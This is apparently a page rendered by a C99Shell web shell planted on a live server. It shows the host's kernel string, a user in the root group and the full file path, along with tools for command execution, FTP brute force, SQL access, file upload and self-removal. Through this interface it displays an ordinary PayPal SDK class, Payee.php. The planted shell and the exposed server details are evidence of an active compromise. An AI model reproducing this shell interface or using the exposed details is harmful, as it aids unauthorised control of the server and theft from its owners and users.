!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Payee.php (3.78 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace PayPal\Api;

use 
PayPal\Common\PayPalModel;

/**
 * Class Payee
 *
 * A resource representing a Payee who receives the funds and fulfills the order.
 *
 * @package PayPal\Api
 *
 * @property string email
 * @property string merchant_id
 */
class Payee extends PayPalModel
{
    
/**
     * Email Address associated with the Payee's PayPal Account. If the provided email address is not associated with any PayPal Account, the payee can only receiver PayPal Wallet Payments. Direct Credit Card Payments will be denied due to card compliance requirements.
     *
     * @param string $email
     *
     * @return $this
     */
    
public function setEmail($email)
    {
        
$this->email $email;
        return 
$this;
    }

    
/**
     * Email Address associated with the Payee's PayPal Account. If the provided email address is not associated with any PayPal Account, the payee can only receiver PayPal Wallet Payments. Direct Credit Card Payments will be denied due to card compliance requirements.
     *
     * @return string
     */
    
public function getEmail()
    {
        return 
$this->email;
    }

    
/**
     * Encrypted PayPal account identifier for the Payee.
     *
     * @param string $merchant_id
     *
     * @return $this
     */
    
public function setMerchantId($merchant_id)
    {
        
$this->merchant_id $merchant_id;
        return 
$this;
    }

    
/**
     * Encrypted PayPal account identifier for the Payee.
     *
     * @return string
     */
    
public function getMerchantId()
    {
        return 
$this->merchant_id;
    }

    
/**
     * First Name of the Payee.
     *
     * @deprecated Not publicly available
     * @param string $first_name
     *
     * @return $this
     */
    
public function setFirstName($first_name)
    {
        
$this->first_name $first_name;
        return 
$this;
    }

    
/**
     * First Name of the Payee.
     *
     * @deprecated Not publicly available
     * @return string
     */
    
public function getFirstName()
    {
        return 
$this->first_name;
    }

    
/**
     * Last Name of the Payee.
     *
     * @deprecated Not publicly available
     * @param string $last_name
     *
     * @return $this
     */
    
public function setLastName($last_name)
    {
        
$this->last_name $last_name;
        return 
$this;
    }

    
/**
     * Last Name of the Payee.
     *
     * @deprecated Not publicly available
     * @return string
     */
    
public function getLastName()
    {
        return 
$this->last_name;
    }

    
/**
     * Unencrypted PayPal account Number of the Payee
     *
     * @deprecated Not publicly available
     * @param string $account_number
     *
     * @return $this
     */
    
public function setAccountNumber($account_number)
    {
        
$this->account_number $account_number;
        return 
$this;
    }

    
/**
     * Unencrypted PayPal account Number of the Payee
     *
     * @deprecated Not publicly available
     * @return string
     */
    
public function getAccountNumber()
    {
        return 
$this->account_number;
    }

    
/**
     * Information related to the Payer. In case of PayPal Wallet payment, this information will be filled in by PayPal after the user approves the payment using their PayPal Wallet.
     *
     * @deprecated Not publicly available
     * @param \PayPal\Api\Phone $phone
     *
     * @return $this
     */
    
public function setPhone($phone)
    {
        
$this->phone $phone;
        return 
$this;
    }

    
/**
     * Information related to the Payer. In case of PayPal Wallet payment, this information will be filled in by PayPal after the user approves the payment using their PayPal Wallet.
     *
     * @deprecated Not publicly available
     * @return \PayPal\Api\Phone
     */
    
public function getPhone()
    {
        return 
$this->phone;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--